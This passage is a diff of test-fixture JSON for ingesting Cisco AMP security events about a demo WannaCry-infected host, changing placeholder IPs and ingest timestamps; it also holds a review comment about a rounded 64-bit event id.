"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -277,7 +277,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -322,7 +322,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -332,8 +332,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103723229Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461482400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -353,7 +353,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -398,7 +398,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -408,8 +408,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103725271Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:51.461487300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -429,7 +429,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -479,7 +479,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -496,8 +496,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103727348Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461493200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -519,7 +519,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -576,7 +576,7 @@ "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
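Review bot: The `\"id\":6419229331435815000` inside the new `event.original` of the `@@ -496,8 +496,8 @@` hunk looks like a 64-bit identifier that has already been rounded to IEEE-754 double precision — its sibling `\"detection_id\":\"6419229331435814973\"` is carried as a string and keeps its low digits, while the numeric `id` ends in `815000` — so the sample was evidently round-tripped through a JSON serializer that does not preserve large integers. That makes the fixture blind to the same precision loss in the ingest pipeline: if `data.id` is mapped to a `long` field (the mapping is not visible here), an event whose real id exceeds 2^53 would pass this test while silently losing digits. Since the sample is being edited anyway, consider regenerating the raw event with the exact id, or using an id below 2^53 if the upstream API really emits it as a JSON number, so the expected output pins exact id preservation. The same rounded value appears in every record of the accompanying `.log` fixture, whose hunk starts before this chunk.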
@@ -593,8 +593,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103729393Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:51.461499200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -616,7 +616,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -666,7 +666,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -683,8 +683,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103731430Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461503100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -706,7 +706,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -752,7 +752,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -769,8 +769,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103733483Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461507100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -792,7 +792,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -833,7 +833,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -843,8 +843,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103735553Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461510700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -864,7 +864,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -905,7 +905,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -915,8 +915,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103737757Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat 